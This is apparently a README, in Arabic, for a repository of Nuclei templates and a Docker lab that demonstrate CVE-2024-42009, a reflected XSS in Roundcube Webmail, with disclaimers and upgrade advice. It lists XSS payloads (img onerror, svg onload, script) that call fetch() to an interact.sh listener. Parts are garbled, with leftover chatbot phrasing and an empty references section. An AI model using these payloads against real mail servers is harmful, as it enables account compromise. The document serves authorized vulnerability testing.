
قوالب Nuclei ومختبر Docker لإظهار والتحقق من CVE-2024-42009، وهي XSS منعكسة في Roundcube Webmail، باستخدام كشف خارج النطاق عبر Interactsh للاختبار المصرح به.
يحتوي هذا المستودع على قالب Nuclei وموارد داعمة لعرض والتحقق بأمان من CVE-2024-42009، وهي ثغرة XSS منعكسة حرجة في Roundcube Webmail. يكمن الخلل في الدالة message_body() في show.php، حيث تؤدي التعديلات بعد التعقيم إلى إزالة التعقيم وعرض غير آمن لمحتوى HTML مخصص لرسائل البريد الإلكتروني.
⚠️ هذا الـ PoC مخصص للأغراض التعليمية والاختبارات المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
message_body() في show.phpيستخدم هذا المستودع اكتشاف خارج النطاق (OOB) عبر Interactsh لتأكيد تنفيذ JavaScript في بيئة مخبرية خاضعة للتحكم.
<body> يتضمن onanimationstart وإشارة إلى Interactshاستخدم ملف Docker Compose المرفق لتشغيل نسخة محلية من Roundcube مع MailHog (مستقبل SMTP) وMariaDB.
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
http://localhost:8080http://localhost:8025⚠️ لا تستخدم حساب Google الخاص بك.
CVE-2024-42009-OOB.yaml – قالب Nuclei مع Interactsh واكتشاف خارج النطاق (OOB)CVE-2024-42009.yaml – قالب Nuclei بدون Interactsh وOOBdocker-compose.yml – إعداد بيئة مخبرية لـ Roundcube WebmailImages/ – لقطات شاشة تُظهر نتائج HTTP/DNS من Interactshيستعرض هذا الفيديو سلسلة الاستغلال الكاملة:
لتضمين حمولات XSS هذه في ملف README الخاص بك بشكل مسؤول، يجب وضعها في قسم مُعلَّم بوضوح لأغراض تعليمية أو اختبارية. إليك هيكل مقترح:
⚠️ إخلاء مسؤولية: هذه الحمولات مخصصة للاستخدام التعليمي والاختبارات الأمنية المصرح بها فقط. لا تقم بنشرها على أنظمة دون إذن صريح.
<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">
<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/main/x" onerror="fetch('https://interact.sh/hit')">
<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>
<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>
<!-- JavaScript in iframe src -->
https://interact.sh/hit بنقطة نهاية الاستماع الخاصة بك.قم بترقية Roundcube إلى:
ممتاز — إليك قسم المراجع النظيف والاحترافي الذي يمكنك تضمينه في ملف README أو إرساله عبر البريد الإلكتروني لـ CVE-2024-42009. يستشهد بجميع المصادر التي أدرجتها، منسقة للوضوح والمصداقية: